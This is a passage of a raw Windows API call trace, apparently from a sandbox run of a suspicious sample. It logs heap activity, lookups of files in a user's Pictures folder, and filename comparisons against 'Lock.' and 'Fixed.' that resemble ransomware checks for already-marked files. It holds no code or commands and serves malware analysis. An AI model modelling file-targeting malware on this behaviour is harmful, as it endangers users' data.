0x240c8d0 [0256.075] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures/JP0X848xky.gif", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\JP0X848xky.gif", lpFilePart=0x8bf658*="JP0X848xky.gif") returned 0x35 [0256.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240c8d0 | out: hHeap=0x25c0000) returned 1 [0256.075] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\JP0X848xky.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\jp0x848xky.gif")) returned 0xffffffff [0256.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3190 | out: hHeap=0x25c0000) returned 1 [0256.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0256.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0256.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0256.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0256.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0256.076] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0256.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0256.076] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0256.076] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0256.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0256.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0256.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0256.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0256.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0256.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0256.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0256.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0256.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0256.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0256.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0256.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0256.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0256.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="krvo L5sveZ W.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0256.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rvo L5sveZ W.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0256.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vo L5sveZ W.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0256.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o L5sveZ W.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0256.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" L5sveZ W.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0256.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="L5sveZ W.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0256.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5sveZ W.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0256.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sveZ W.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0256.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="veZ W.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0256.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eZ W.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0256.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Z W.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0256.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" W.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0256.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" W.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0256.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="W.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0256.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0256.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0256.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0256.078] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0256.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0256.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0256.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0256.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0256.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0256.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="krvo L5sveZ W.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0256.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rvo L5sveZ W.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0256.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vo L5sveZ W.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0256.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o L5sveZ W.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0256.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" L5sveZ W.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0256.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="L5sveZ W.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0256.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5sveZ W.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0256.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sveZ W.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0256.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="veZ W.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0256.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eZ W.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0256.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Z W.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0256.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" W.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0256.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" W.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0256.078] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0256.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0256.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0256.079] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0256.079] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0256.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0256.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0256.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa8a8 [0256.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0256.079] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0256.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0256.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0256.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa7a0 [0256.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0256.079] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0256.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0256.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0256.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0256.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0256.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0256.080] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0256.080] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.080] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0256.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0256.080] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0256.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0256.080] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0256.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0256.080] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0256.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0256.080] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures/krvo L5sveZ W.png", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4476fe0, ftCreationTime.dwHighDateTime=0x1d4d126, ftLastAccessTime.dwLowDateTime=0xfda7ffb0, ftLastAccessTime.dwHighDateTime=0x1d4c996, ftLastWriteTime.dwLowDateTime=0xfda7ffb0, ftLastWriteTime.dwHighDateTime=0x1d4c996, nFileSizeHigh=0x0, nFileSizeLow=0x94b9, dwReserved0=0xa490047, dwReserved1=0x1eb3c, cFileName="krvo L5sveZ W.png", cAlternateFileName="KRVOL5~1.PNG")) returned 0xaa58a0 [0256.081] FindClose (in: hFindFile=0xaa58a0 | out: hFindFile=0xaa58a0) returned 1 [0256.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0256.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0256.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0256.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0256.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0256.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0256.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0256.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0256.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0256.081] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0256.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0256.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0256.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0256.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0256.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0256.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0256.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0256.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0256.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0256.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0256.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0256.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0256.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0256.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0256.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0256.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0256.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0256.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0256.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0256.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0256.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0256.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0256.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0256.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0256.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0256.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0256.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0256.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0256.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0256.083] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0256.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0256.083] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0256.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0256.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0256.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9ed0 [0256.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0256.083] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0256.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0256.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0256.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0256.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0256.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0256.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0256.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0256.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0256.084] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0256.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0256.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0256.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0256.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0256.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0256.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0256.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0256.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0256.084] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0256.084] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0256.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0256.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0256.085] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0256.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0256.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0256.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f18 [0256.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0256.085] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0256.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0256.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0256.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0256.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0256.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0256.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0256.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0256.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0256.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0256.085] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0256.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0256.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0256.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0256.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0256.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0256.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0256.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0256.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0256.086] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0256.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0256.086] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0256.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0256.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0256.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0256.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0256.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0256.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0256.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0256.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0256.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0256.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0256.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0256.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0256.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0256.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0256.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0256.087] RtlAllocateHeap 